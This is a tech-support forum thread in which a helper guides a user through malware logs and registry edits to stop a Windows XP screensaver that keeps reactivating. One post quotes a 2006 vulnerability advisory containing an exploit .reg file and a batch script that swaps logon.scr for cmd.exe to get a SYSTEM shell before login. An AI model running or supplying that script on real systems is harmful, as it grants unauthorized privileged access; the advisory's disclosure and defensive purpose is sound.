TechSpot

PC Performance Analysis and Stability Malware / registry repairs?

Solved
By LaptopWrecked
Jun 10, 2011
Topic Status:
Not open for further replies.
  1. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    Here is the OTL log

    All processes killed
    ========== OTL ==========
    ========== SERVICES/DRIVERS ==========
    ========== REGISTRY ==========
    ========== FILES ==========
    C:\Documents and Settings\fix.ASUS-P1-W3V.000\Desktop\RegistryGenius_Setup.exe moved successfully.
    C:\Program Files\Common Files\Wise Installation Wizard\WIS6A615007721D4063B226EA41EB6604B9_9_0_3_3.MSI moved successfully.
    ========== COMMANDS ==========

    [EMPTYTEMP]

    User: Administrator
    ->Temp folder emptied: 0 bytes
    ->Temporary Internet Files folder emptied: 0 bytes
    ->Flash cache emptied: 0 bytes

    User: All Users

    User: Default User
    ->Temp folder emptied: 0 bytes
    ->Temporary Internet Files folder emptied: 0 bytes
    ->Flash cache emptied: 0 bytes

    User: fix
    ->Temp folder emptied: 0 bytes
    ->Temporary Internet Files folder emptied: 0 bytes
    ->Java cache emptied: 0 bytes
    ->FireFox cache emptied: 0 bytes
    ->Flash cache emptied: 0 bytes

    User: fix.ASUS-P1-W3V
    ->Temp folder emptied: 0 bytes
    ->Temporary Internet Files folder emptied: 0 bytes
    ->FireFox cache emptied: 0 bytes
    ->Flash cache emptied: 0 bytes

    User: fix.ASUS-P1-W3V.000
    ->Temp folder emptied: 856938 bytes
    ->Temporary Internet Files folder emptied: 33170 bytes
    ->Java cache emptied: 0 bytes
    ->FireFox cache emptied: 63362207 bytes
    ->Flash cache emptied: 853 bytes

    User: Guest
    ->Temp folder emptied: 0 bytes
    ->Temporary Internet Files folder emptied: 0 bytes
    ->Flash cache emptied: 0 bytes

    User: LocalService
    ->Temp folder emptied: 0 bytes
    ->Temporary Internet Files folder emptied: 0 bytes

    User: NetworkService
    ->Temp folder emptied: 0 bytes
    ->Temporary Internet Files folder emptied: 33223 bytes

    User: xxxxxxxxxxx

    %systemdrive% .tmp files removed: 0 bytes
    %systemroot% .tmp files removed: 0 bytes
    %systemroot%\System32 .tmp files removed: 0 bytes
    %systemroot%\System32\dllcache .tmp files removed: 0 bytes
    %systemroot%\System32\drivers .tmp files removed: 0 bytes
    Windows Temp folder emptied: 483 bytes
    %systemroot%\system32\config\systemprofile\Local Settings\Temp folder emptied: 0 bytes
    %systemroot%\system32\config\systemprofile\Local Settings\Temporary Internet Files folder emptied: 0 bytes
    RecycleBin emptied: 0 bytes

    Total Files Cleaned = 61.00 mb


    [EMPTYFLASH]

    User: Administrator
    ->Flash cache emptied: 0 bytes

    User: All Users

    User: Default User
    ->Flash cache emptied: 0 bytes

    User: fix
    ->Flash cache emptied: 0 bytes

    User: fix.ASUS-P1-W3V
    ->Flash cache emptied: 0 bytes

    User: fix.ASUS-P1-W3V.000
    ->Flash cache emptied: 0 bytes

    User: Guest
    ->Flash cache emptied: 0 bytes

    User: LocalService

    User: NetworkService

    User: xxxxxxxxxx

    Total Flash Files Cleaned = 0.00 mb


    OTL by OldTimer - Version 3.2.24.0 log created on 06182011_165037

    Files\Folders moved on Reboot...

    Registry entries deleted on Reboot...
     
  2. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    One remaining problem?

    Whatever program is making the "mystify" screensaver launch is still active, I think. Is there any specific way to check that or to know how dangerous it may be?

    Should I run the OTL cleanup?
     
  3. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    Hold on with the cleanup...

    Please download SystemLook from one of the links below and save it to your Desktop.
    Download Mirror #1
    Download Mirror #2

    64-bit users go HERE
    • Double-click SystemLook.exe to run it.
    • Vista\Win 7 users:: Right click on SystemLook.exe, click Run As Administrator
    • Copy the content of the following box into the main textfield:
      Code:
      :filefind
      *.scr
      :reg
      HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Control Panel
      HKEY_USERS\.DEFAULT\Control Panel\Desktop
      
    • Click the Look button to start the scan.
    • When finished, a notepad window will open with the results of the scan. Please post this log in your next reply.
    Note: The log can also be found on your Desktop entitled SystemLook.txt
     
  4. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    SystemLook 04.09.10 by jpshortstuff
    Log created at 17:57 on 18/06/2011 by fix
    Administrator - Elevation successful

    ========== filefind ==========

    Searching for "*.scr"
    C:\Documents and Settings\All Users\Documents\rkill.scr --a---- 1007108 bytes [05:18 03/06/2011] [05:28 03/06/2011] F206C61003B5F9E32A870CA9C6505963
    C:\Documents and Settings\fix.ASUS-P1-W3V\My Documents\Downloads\dds.scr -r----- 607222 bytes [05:48 10/06/2011] [05:48 10/06/2011] 758F537224E3F3EDF1D80D98D000DA06
    C:\Documents and Settings\fix.ASUS-P1-W3V.000\Desktop\dds.scr -r----- 607222 bytes [17:40 10/06/2011] [17:40 10/06/2011] 758F537224E3F3EDF1D80D98D000DA06
    C:\Documents and Settings\fix.ASUS-P1-W3V.000\Desktop\rkill.scr --a---- 1007120 bytes [06:32 12/06/2011] [06:32 12/06/2011] 62B8E10334799A27218FBE57708A9FC1
    C:\Documents and Settings\fix.ASUS-P1-W3V.000\My Documents\Downloads\dds.scr --a---- 607222 bytes [17:33 10/06/2011] [17:33 10/06/2011] 758F537224E3F3EDF1D80D98D000DA06
    C:\Program Files\SDHelper (Spybot - Search & Destroy)\STQSEYVRYIKRNYNY.scr -rahs-- 1562960 bytes [08:31 16/06/2011] [21:25 15/09/2008] 35F73F1936BDE91F1B6995510A61E7A8
    C:\Program Files\Spybot - Search & Destroy\GTLCSEUDCSDJNF.scr -rahs-- 1740632 bytes [08:49 16/06/2011] [22:31 26/01/2009] 7C616AD7AE8F75278A069641ECFCDC06
    C:\Program Files\Spybot - Search & Destroy\KFRRJMFAONNJVHGPGV.scr --a---- 4393096 bytes [08:49 16/06/2011] [06:04 31/05/2005] 09CA174A605B480318731E691DC98539
    C:\Program Files\Spybot - Search & Destroy\YVGXLHHZOXWJ.scr -rahs-- 2144088 bytes [08:49 16/06/2011] [22:31 26/01/2009] 896A1DB9A972AD2339C2E8569EC926D1
    C:\Program Files\TeaTimer (Spybot - Search & Destroy)\XXIXEEZJBUKYWHXIH.scr -rahs-- 2260480 bytes [08:31 16/06/2011] [23:07 05/03/2009] 390679F7A217A5E73D756276C40AE887
    C:\WINDOWS\$NtServicePackUninstall$\logon.scr -----c- 220672 bytes [21:24 09/11/2008] [12:00 04/08/2004] 43FCEEF75FD6208925DDD4FFF8C36723
    C:\WINDOWS\$NtServicePackUninstall$\scrnsave.scr -----c- 9216 bytes [21:24 09/11/2008] [12:00 04/08/2004] BDFA8CF643506ECFAA89AA60250C4C08
    C:\WINDOWS\$NtServicePackUninstall$\ss3dfo.scr -----c- 704512 bytes [21:24 09/11/2008] [12:00 04/08/2004] F7A268DC8F94B4404ADF6C648BF54289
    C:\WINDOWS\$NtServicePackUninstall$\ssbezier.scr -----c- 19968 bytes [21:24 09/11/2008] [12:00 04/08/2004] 7309359BBE66C6CE4CD733B8F8F02953
    C:\WINDOWS\$NtServicePackUninstall$\ssflwbox.scr -----c- 393216 bytes [21:24 09/11/2008] [12:00 04/08/2004] 72A5555729E786566823E6BB4ACD6FBD
    C:\WINDOWS\$NtServicePackUninstall$\ssmarque.scr -----c- 20992 bytes [21:24 09/11/2008] [12:00 04/08/2004] 16869817BEE71AED4003B2C380B1FD44
    C:\WINDOWS\$NtServicePackUninstall$\ssmypics.scr -----c- 47104 bytes [21:24 09/11/2008] [12:00 04/08/2004] 931B08F87AC66DA54FD5A0D8F73F5F34
    C:\WINDOWS\$NtServicePackUninstall$\ssmyst.scr -----c- 18944 bytes [21:24 09/11/2008] [12:00 04/08/2004] 815A6CE9069C7D42E169657923C50756
    C:\WINDOWS\$NtServicePackUninstall$\sspipes.scr -----c- 610304 bytes [21:24 09/11/2008] [12:00 04/08/2004] F6D28802AA6423D84F918AB202FA0584
    C:\WINDOWS\$NtServicePackUninstall$\ssstars.scr -----c- 14336 bytes [21:24 09/11/2008] [12:00 04/08/2004] B7D61243AB22F27D059030499EC791F5
    C:\WINDOWS\$NtServicePackUninstall$\sstext3d.scr -----c- 679936 bytes [21:24 09/11/2008] [12:00 04/08/2004] 5AB7A4EBBEA9B44C112FE99BC099837D
    C:\WINDOWS\ServicePackFiles\i386\logon.scr ------- 220672 bytes [00:12 14/04/2008] [00:12 14/04/2008] 9FAD7DFF67555FF1E06BC4A3893024A7
    C:\WINDOWS\ServicePackFiles\i386\scrnsave.scr ------- 9216 bytes [00:12 14/04/2008] [00:12 14/04/2008] 7BA27A296EE84861BFE97B96874CCAA6
    C:\WINDOWS\ServicePackFiles\i386\ss3dfo.scr ------- 704512 bytes [00:12 14/04/2008] [00:12 14/04/2008] 2C0033EA0853E27C8E30603642D9FA84
    C:\WINDOWS\ServicePackFiles\i386\ssbezier.scr ------- 19968 bytes [00:12 14/04/2008] [00:12 14/04/2008] 07EBBE91C46376AB0D38D61A629185B0
    C:\WINDOWS\ServicePackFiles\i386\ssflwbox.scr ------- 393216 bytes [00:12 14/04/2008] [00:12 14/04/2008] E27992B5BE536EDE2D50A253A880C852
    C:\WINDOWS\ServicePackFiles\i386\ssmarque.scr ------- 20992 bytes [00:12 14/04/2008] [00:12 14/04/2008] 6700DBF0268936EDF0922FE469DD3138
    C:\WINDOWS\ServicePackFiles\i386\ssmypics.scr ------- 47104 bytes [00:12 14/04/2008] [00:12 14/04/2008] 5E453CB99DF0838226DEFC05F3484CDF
    C:\WINDOWS\ServicePackFiles\i386\ssmyst.scr ------- 18944 bytes [00:12 14/04/2008] [00:12 14/04/2008] 636F1508799C0333FAD8E7F82FE545CA
    C:\WINDOWS\ServicePackFiles\i386\sspipes.scr ------- 610304 bytes [00:12 14/04/2008] [00:12 14/04/2008] D5B0ED8ECA34F8480E555F47269AB0BA
    C:\WINDOWS\ServicePackFiles\i386\ssstars.scr ------- 14336 bytes [00:12 14/04/2008] [00:12 14/04/2008] 86984E591641191236033D2A4D80ED56
    C:\WINDOWS\ServicePackFiles\i386\sstext3d.scr ------- 679936 bytes [00:12 14/04/2008] [00:12 14/04/2008] D66709F79D595DD378C995C3347349C1
    C:\WINDOWS\system32\7E7 Screensaver.scr --a---- 7732880 bytes [07:13 11/09/2006] [07:13 11/09/2006] C9B1EF9ED9E404EBAD2E539A2F7E979E
    C:\WINDOWS\system32\Boeing 747-8.scr --a---- 2947372 bytes [19:26 16/02/2006] [19:26 16/02/2006] 2AF2CC23586C2DA2B4D6181A969064F0
    C:\WINDOWS\system32\logon.scr --a---- 220672 bytes [12:00 04/08/2004] [00:12 14/04/2008] 9FAD7DFF67555FF1E06BC4A3893024A7
    C:\WINDOWS\system32\scrnsave.scr --a---- 9216 bytes [12:00 04/08/2004] [00:12 14/04/2008] 7BA27A296EE84861BFE97B96874CCAA6
    C:\WINDOWS\system32\ss3dfo.scr --a---- 704512 bytes [12:00 04/08/2004] [00:12 14/04/2008] 2C0033EA0853E27C8E30603642D9FA84
    C:\WINDOWS\system32\ssbezier.scr --a---- 19968 bytes [12:00 04/08/2004] [00:12 14/04/2008] 07EBBE91C46376AB0D38D61A629185B0
    C:\WINDOWS\system32\ssflwbox.scr --a---- 393216 bytes [12:00 04/08/2004] [00:12 14/04/2008] E27992B5BE536EDE2D50A253A880C852
    C:\WINDOWS\system32\ssmarque.scr --a---- 20992 bytes [12:00 04/08/2004] [00:12 14/04/2008] 6700DBF0268936EDF0922FE469DD3138
    C:\WINDOWS\system32\ssmypics.scr --a---- 47104 bytes [12:00 04/08/2004] [00:12 14/04/2008] 5E453CB99DF0838226DEFC05F3484CDF
    C:\WINDOWS\system32\ssmyst.scr --a---- 18944 bytes [12:00 04/08/2004] [00:12 14/04/2008] 636F1508799C0333FAD8E7F82FE545CA
    C:\WINDOWS\system32\sspipes.scr --a---- 610304 bytes [12:00 04/08/2004] [00:12 14/04/2008] D5B0ED8ECA34F8480E555F47269AB0BA
    C:\WINDOWS\system32\ssstars.scr --a---- 14336 bytes [12:00 04/08/2004] [00:12 14/04/2008] 86984E591641191236033D2A4D80ED56
    C:\WINDOWS\system32\sstext3d.scr --a---- 679936 bytes [12:00 04/08/2004] [00:12 14/04/2008] D66709F79D595DD378C995C3347349C1

    ========== reg ==========

    [HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Control Panel]
    (Unable to open key - key not found)

    [HKEY_USERS\.DEFAULT\Control Panel\Desktop]
     
  5. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    Give me some more details about that "mystify" screensaver.
    When exactly can you see it, why do you call it "mystify" and whatever else you can give me...
     
  6. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    I call it "mystify" because that's it's name in the screensaver choices under display settings in control panel.

    Well, I have a Spybot dialogue box popping up every once in a while telling me a warning that the system is trying to change a registry value with file names that look like they belong to the "mystify" screensaver-- ( it is the one that is a bunch of triangles that bounce around on a black background). I have NEVER chosen to run that screensaver on my computer. If I fail to stop it, It sets itself to activate at 1 minute of inactivity. Sometimes it doesn't show up, sometimes it does.

    Anyway, in the Spybot dialogue box I can choose to allow or deny the registry change, so every time it's popped up I have denied it. But I think once it ran even though I denied it in the spybot box.

    Are any of these relevant files?

    C:\WINDOWS\system32\ssmyst.scr --a---- 18944 bytes [12:00 04/08/2004] [00:12 14/04/2008] 636F1508799C0333FAD8E7F82FE545CA

    C:\WINDOWS\ServicePackFiles\i386\ssmyst.scr ------- 18944 bytes [00:12 14/04/2008] [00:12 14/04/2008] 636F1508799C0333FAD8E7F82FE545CA

    C:\WINDOWS\$NtServicePackUninstall$\ssmyst.scr -----c- 18944 bytes [21:24 09/11/2008] [12:00 04/08/2004] 815A6CE9069C7D42E169657923C50756
     
  7. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    It looks like that's the "offending" file, but....it's a legit Microsoft screensaver, so I'm not sure why you're actually complaining about it.
     
  8. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    I just don't know why it has launched itself at a 1 minute start time when I have not selected any screensaver to run at all.

    That is not normal, correct?
     
  9. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    Double check screensaver settings. Something must be allowing to run.

    Then continue with OTL cleanup and other steps.
     
  10. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    Upon computer start up/ loading windows my Spybot program caught it again.

    Here is the text from the Spybot dialogue window:

    Registry change alert
    Category: Desktop Settings
    Change: Value Added
    Entry: scrnsave.exe
    New Data: C:WINDOWS\system32\ssmyst.scr

    I then deny the change. I also looked for ssmyst.scr in the path shown above, but I don't see it in the tree.
     
  11. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    Why are you denying it?
    It's a legit Windows file.
     
     
  12. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    i just don't understand why it's launching itself without my asking for it to run.
     
  13. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    Double check screensaver settings.
     
  14. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    I have "none" selected in control panel.

    When this thing launches it runs the "mystify" screensaver at a 1 minute time selection. Without me asking for it.
     
  15. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    Launch Notepad and paste the following four lines. (Note: The second line must be blank.)

    Code:
    Windows Registry Editor Version 5.00
    
    [HKEY_CURRENT_USER\Control Panel\Desktop]
    "ScreenSaveActive"="0"
    
    Save the file to your desktop with the name Disable ScreenSaver.reg.

    Right click on the above file, click "Merge".

    Restart computer.

    Re-run System Look with the following code:

    Code:
    :reg
    HKEY_USERS\.DEFAULT\Control Panel\Desktop
    
    Post the log.
     
  16. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    SystemLook 04.09.10 by jpshortstuff
    Log created at 15:41 on 19/06/2011 by fix
    Administrator - Elevation successful

    ========== reg ==========

    [HKEY_USERS\.DEFAULT\Control Panel\Desktop]
    "ActiveWndTrkTimeout"= 0x0000000000 (0)
    "AutoEndTasks"="0"
    "CaretWidth"= 0x0000000001 (1)
    "CoolSwitch"="1"
    "CoolSwitchColumns"="7"
    "CoolSwitchRows"="3"
    "CursorBlinkRate"="530"
    "DragFullWindows"="2"
    "DragHeight"="4"
    "DragWidth"="4"
    "FontSmoothing"="2"
    "FontSmoothingOrientation"= 0x0000000001 (1)
    "FontSmoothingType"= 0x0000000001 (1)
    "ForegroundFlashCount"= 0x0000000003 (3)
    "ForegroundLockTimeout"= 0x0000030d40 (200000)
    "GridGranularity"="0"
    "HungAppTimeout"="5000"
    "LowPowerActive"="0"
    "LowPowerTimeOut"="0"
    "MenuShowDelay"="400"
    "PaintDesktopVersion"= 0x0000000000 (0)
    "Pattern"="(None)"
    "PowerOffActive"="0"
    "PowerOffTimeOut"="0"
    "ScreenSaverIsSecure"="0"
    "ScreenSaveTimeOut"="600"
    "ScreenSaveActive"="1"
    "SCRNSAVE.EXE"="logon.scr"
    "TileWallpaper"="0"
    "UserPreferencesMask"=9e 3e 03 80 (REG_BINARY)
    "WaitToKillAppTimeout"="20000"
    "Wallpaper"="(None)"
    "WallpaperStyle"="2"
    "OriginalWallpaper"=""
    "WheelScrollLines"="3"

    [HKEY_USERS\.DEFAULT\Control Panel\Desktop\WindowMetrics]


    -= EOF =-




    Have to go to work now. Thanks for all the assistance. Back about 9pm pacific time.
     
  17. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    Found Screensaver Vulnerability Post on another site

    Does this look like what may be going on with my system?


    -- Advisory Name --

    Default Screen Saver Vulnerability in Microsoft Windows

    -- Author --

    Susam Pal

    -- Vulnerable Systems --

    Windows XP, Windows 2003 Server

    -- Vulnerability Description --

    This vulnerability has been tested on Windows XP and Windows 2003 Server. The screen saver in these systems is allowed to run even when a user hasn't logged in. To verify this one has to start windows and wait for the default screen saver to appear without logging in. The screen saver should appear after 10 minutes because that is the default value of screen saver time-out.

    Since no user logs in, this screen saver runs as a system process. The registry entries for this screen saver running as a system process can be found in the registry-key, "HKEY_USERS\.DEFAULT\Control Panel\Desktop". The following are the default values.

    Windows Registry Editor Version 5.00

    [HKEY_USERS\.DEFAULT\Control Panel\Desktop]

    "ScreenSaverIsSecure"="0"

    "ScreenSaveTimeOut"="600"

    "ScreenSaveActive"="1"

    "SCRNSAVE.EXE"="logon.scr"

    It can be seen that the default time-out value is 600 seconds or 10 minutes.

    An attacker can replace the default screen saver (logon.scr) with the command prompt (cmd.exe) and reduce the time-out period in a system by using a trojan or some other means. Later, the attacker can boot the system and wait for the screen saver to appear which is now the command prompt. Since the command prompt now runs as a system process, the attacker can perform critical operations including malicious ones. He may even execute "explorer.exe" to bring up the Windows GUI along with the desktop, start button, etc.

    -- Exploit Reg File --

    Windows Registry Editor Version 5.00

    [HKEY_USERS\.DEFAULT\Control Panel\Desktop]

    "ScreenSaverIsSecure"="0"

    "ScreenSaveTimeOut"="60"

    "ScreenSaveActive"="1"

    "SCRNSAVE.EXE"="logon.scr"

    -- Exploit Script --

    @echo off

    rem ------------------------------------------------------------------------
    ---

    rem FileName: DSSExploit.bat

    rem Description: This script replaces the default windows screensaver

    rem with command prompt and configures the registry for

    rem attack

    rem Author: Susam Pal

    rem Date: 19th May, 2006

    rem ------------------------------------------------------------------------
    ---

    rem kill logon.scr if its running

    tasklist | find /i "logon.scr"

    if %errorlevel% == 1 goto replace

    taskkill /f /im "logon.scr"

    :replace

    rem replace

    rename %SystemRoot%\System32\logon.scr logon.scr.bak

    copy %ComSpec% %SystemRoot%\System32\logon.scr

    rem update the registry keys for default screen saver

    set DSSKEY="HKEY_USERS\.DEFAULT\Control Panel\Desktop"

    reg add %DSSKEY% /v ScreenSaveActive /t REG_SZ /f /d 1

    reg add %DSSKEY% /v ScreenSaverIsSecure /t REG_SZ /f /d 0

    reg add %DSSKEY% /v ScreenSaveTimeOut /t REG_SZ /f /d 60

    reg add %DSSKEY% /v SCRNSAVE.EXE /t REG_SZ /f /d logon.scr

    -- Prevention --

    One of the following preventive measures should be taken.

    1. The users of the system should not run any program, script or software obtained from unreliable source as an administrator or any user which has the permission to modify the Windows Registry.

    2. Disable screen saver by executing the following command.

    reg add "HKEY_USERS\.DEFAULT\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /f /d 0

    Deny everyone all permissions on the registry key, "My Computer\HKEY_USERS\.DEFAULT\Control Panel\Desktop". This will prevent any malicious program, script or software from modifying the default screen saver settings. This can be done by the following steps.

    a. Run "regedit.exe".

    b. Locate the key, "HKEY_USERS\.DEFAULT\Control Panel\Desktop".

    c. Right click on the key and select "Permissions".

    d. Press "Add" button.

    e. Press "Locations" button.

    f. If a login window appears, click "Cancel" button.

    g. Select the local computer and press "Ok" button.

    h. Enter "Everyone" in the text-area for object names and press "Ok" button.

    8. Deny "Full Control" permission for "Everyone" and press "Ok" button.

    3. Microsoft should release a patch which prevents the screen saver from running before a user logs in with proper authentication.

    -- Disclaimer --

    The information, codes and exploits in this advisory should be used for research, experimentation, bug-fixes and patch-releases only. The author shall not be liable in any event of any damages, incidental or consequential, in connection with, or arising out of this advisory.

    -- Contact Information --

    For more information, please contact:-

    Susam Pal

    Infosys Technologies Ltd.

    Survey No. 210, Manikonda Village

    Lingampally, Rangareddy District

    Hyderabad, PIN 500019

    India

    Phone No.: +91-9985259521

    Email: susam.pal (at) gmail (dot) com [email concealed]

    http://susampal.blogspot.com/

    http://securecoding.blogspot.com/
     
  18. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    Go Start>Run, type in:
    regedit
    Click OK.

    In Registry Editor, navigate to:
    HKEY_USERS\.DEFAULT\Control Panel\Desktop
    In right pane, right click on ScreenSaveActive, click Modify.
    Change the value from 1 to 0 (zero).

    Restart computer.
    Will screensaver stay off?
     
  19. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    I did the edit. I will post results.
     
  20. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    Still with me?
     
  21. LaptopWrecked

    LaptopWrecked TS Rookie Topic Starter Posts: 39

    Still with you.

    Everything seems OK. Just odds and ends from fixing the registry like some programs that had desktop shortcuts (Excel, Word) were gone, calc.exe file disappeared from windows accessories. I guess those things are set up a certain way at windows installation and they reverted to a new install default.

    Screen saver not launching any longer. All appears OK for now. Thanks for the help.
     
  22. Broni

    Broni Malware Annihilator Posts: 46,865   +254

    You're very welcome [​IMG]
     
Topic Status:
Not open for further replies.


Add New Comment

TechSpot Members
Login or sign up for free,
it takes about 30 seconds.
You may also...


Get complete access to the TechSpot community. Join thousands of technology enthusiasts that contribute and share knowledge in our forum. Get a private inbox, upload your own photo gallery and more.